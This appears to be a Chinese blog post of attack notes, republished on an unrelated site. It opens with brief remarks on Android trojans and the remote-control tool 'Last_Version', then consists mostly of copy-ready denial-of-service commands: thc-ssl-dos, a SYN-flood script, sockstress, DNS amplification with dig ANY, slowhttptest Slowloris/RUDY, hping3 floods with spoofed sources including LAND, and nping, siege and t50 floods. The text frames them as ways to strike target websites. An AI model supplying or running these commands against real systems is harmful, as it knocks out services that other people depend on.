手机木马以及移动安全

您所在的位置:网站首页 手机 木马查杀 手机木马以及移动安全

手机木马以及移动安全

2024-07-13 08:29| 来源: 网络整理| 查看: 265

android系统:基于linux

开发语言可能会选择java

原因:应用广泛,什么地方都有java虚拟机

java ->(语言本身特点)臃肿->java虚拟机(也必然臃肿)->(虚拟机本身是C语言写的)c语言->机器语言->操作系统

苹果公司的过程:   oc/swift->机器语言->操纵系统

java功能2:(做网站java web)

jsp+linux+mysql/oracle/db2+tomcat

较好的组合:php+linux+nginx+mysql

java功能3:

jvm pc

java=>jar程序

现状:被kotlin(简单!!!)语言压占市场=>jar程序

java功能4:

java android

java +  c(用c编写.so=windows的dll文件)=>android

kotlin(像python,写代码非常快)+c => android

pc程序的制作选择:

c#(c++++难度不高,用户多)

python(超级简单)都很牛逼

Golang(c的精确度,python的快速开发,几乎啥事都能做)  go语言

纠结什么语言有前途?

这个语言后台的大佬有没有钱投入?

c/c++ 不可能落寞!!!全球都支持它

java 靠oracle公司支持,老旧设备

kotlin 谷歌+Intellj

oc/swift 苹果公司

php 基金会,全球90%的网站都在使用

python 基金会,小部分人工智能开发/快速开发的公司

go 谷歌,区块链开发公司

c++/c#/vb 微软公司

android木马:

需要具备的环境:

java环境

大多数情况,木马只需要具备:

上线,文件控制,提权(可有可无),命令执行

如果想学android开发:

不要太在意自己学的是不是java,因为android上的编程,相当于一门长得很像java的java语言

工具:

Last_Version (手机远控木马控制)

DOS拒绝服务攻击/DDOS分布式拒绝服务攻击(利用tcp三次握手协议缺陷)

目前这种攻击无解

一般大佬的防御(用钱)

kali的更新源设置为阿里云的:

/etc/apt/source.list deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib apt-get update 更新 apt-get install thc-ssl-dos 安装软件

类似kali的安全审计系统 (功能比kali更强大)

https://www.parrotsec.org/

DDOS操作需要的软件: thc-ssl-dos  可以打击https的网站 默认端口是443

DOS:(肉鸡多了使用同样的命令就是DDOS攻击)

ssl-dos:

服务器每次会处理300次/s的ssl请求

这种攻击方法和传统攻击不一样,使用普通带宽也可以考虑打30G带宽的服务器

apt-get install thc-ssl-dos

目标是打击https的网站

thc-ssl-dos [目标ip] [目标ssl端口:443] --accept

syn flood /syn洪水攻击

apt install python-scapy apt install python3-scapy git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git cd Python-SYN-Flood-Attack-Tool chmod 777 ./* python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 5   //c表示number of packets 包的数量 python3 py3_SYN-Flood.py python SYN-Flood.py

sockstress

针对tcp服务,耗尽目标资源,建立大量的sock连接,不消耗网络资源

完成tcp3次握手,最后ack大小为0(客户端不接收数据)

攻击者损耗很小

异步攻击,所以一台设备可以造成很大的效果

windows窗口实现流控

需要python2环境并且安装scapy

sockstress.py [目标ip] [端口号] [线程]

DNS流量放大攻击

发送给dns的数据包94

返回的数据包大小160+

典型的流量放大攻击

单机带宽优势,以小汇多

利用协议的特性放大流量

apt-get install dnsutils  //安装dig命令 dig ANY [目标ip(外网)] @[dns服务器地址] dig ANY qq.com @[dns的ip]

利用回包判断dns服务器是否会被利用

跟很多DNS服务器发信息,让其把数据包等信息回显给要打击的目标A 这样由于返回的数据包是被放大的 也就造成了所谓的流量放大攻击

借助dnsutils来查看不同的DNS服务器其返回的数据包的大小 或者说是放大效果

之后借助收集到的信息在github上下载DNS流量放大攻击工具进行攻击即可

相似类比:NTP放大攻击 

慢速攻击(打击网站有效果):

apt-get install openssl apt-get install libssl-dev apt-get install slowhttptest

slowhttptest

低带宽应用层慢速DOS攻击(相对于cc慢)

擅长攻击apache tomcat...服务器

耗尽应用并发的连接池,类似于http层的syn_flood

http协议默认在服务端全部接收到请求之后才开始处理,如果客户发送的数据包慢速而且不完整,就会导致Dos

可以发动的攻击类型:Slowloris,slow http post攻击

Slowloris:完整的http协议结尾是\r\n\r\n,它的攻击结尾\r\n

slow http post攻击:http头部content-length声明长度,但是body缓慢发送

slow http post慢速攻击(RUDY):

slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.214 -x 10 -p 3

Slowloris攻击:

slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -t GET -u http://192.168.1.214 -x 24 -p 3

hping3

定制发送任何的数据包

-a 伪造源地址

-q 不返回

-n 不解析域名

-s 源端口

-d 字节数

-p 端口

--flood 以flood方式攻击

syn-flood

hping3 -c 3000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip] hping3 -S -P -p 80 --flood --rand-source [目标ip]

tcp-flood

hping3 -SARUFP -p 80 --flood --rand-source [目标ip]

icmp-flood

hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]

udp-flood

hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]

LAND

特殊的syn-flood攻击

源地址和目的地址都是受害者,自己和自己完成3次握手

hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]

TCP全链接DOS攻击

nping --tcp-connect --rate=10000 -c 10000000 -q [目标ip]

siege发起攻击

siege -i -c 1000000 [目标ip] -A httttttp

t50压力测试

网络协议支持全面

t50 -h 可以查看参数 t50 [目标网关] --flood --turbo -S --protocol TCP --dport 22 t50 --flood --protocol TCP [目标ip] --dport 80



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3